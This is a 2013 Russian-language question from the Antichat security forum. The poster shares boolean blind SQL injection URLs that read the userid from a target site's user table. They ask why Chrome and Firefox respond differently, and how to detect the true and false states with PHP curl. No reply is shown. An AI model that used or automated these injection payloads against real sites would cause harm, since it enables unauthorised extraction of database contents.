HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 16.08.2013, 16:37
Cennarios
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497

Репутация: 303
По умолчанию

Доброго!

Может, кто кратко даст наводку в чем разница между запросом в chrome и firefox. При выполнении запроса в chrome вида site/?id=+and+find_in_set(substring((SELECT+userid+FROM +user+limit+0,1),1,1),'1,d,2,3,4,5,6,7,8,9,a,b,c,d ,e,f')--+ выдает актуальную страницу без ошибок и редиректов, меняя шаблон site/?id=+and+find_in_set(substring((SELECT+userid+FROM +user+limit+0,1),1,1),'т,d,2,3,4,5,6,7,8,9,a,b,c, d,e,f')--+ заведомо убирая оттуда соответствие условию происходит редирект(условие для реализации blind). Ежели точно такой же запрос отправить в FF, то в любом случае выдает валидную страницу. Те даже если сделать site/?id=+and+find_in_set(substring((SELECT+userid+FROM +user+limit+0,1),1,1),'и,d,2,3,4,5,6,7,8,9,a,b,c, d,e,f')--+ зная точно заранее что userid=1, все равно выдает валидную страницу, хотя в шаблоне 1 отсутствует.

Конкретнее - необходимо через php curl снять разные состояния.

P.S. Заранее благодарен!
 
Ответить с цитированием
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.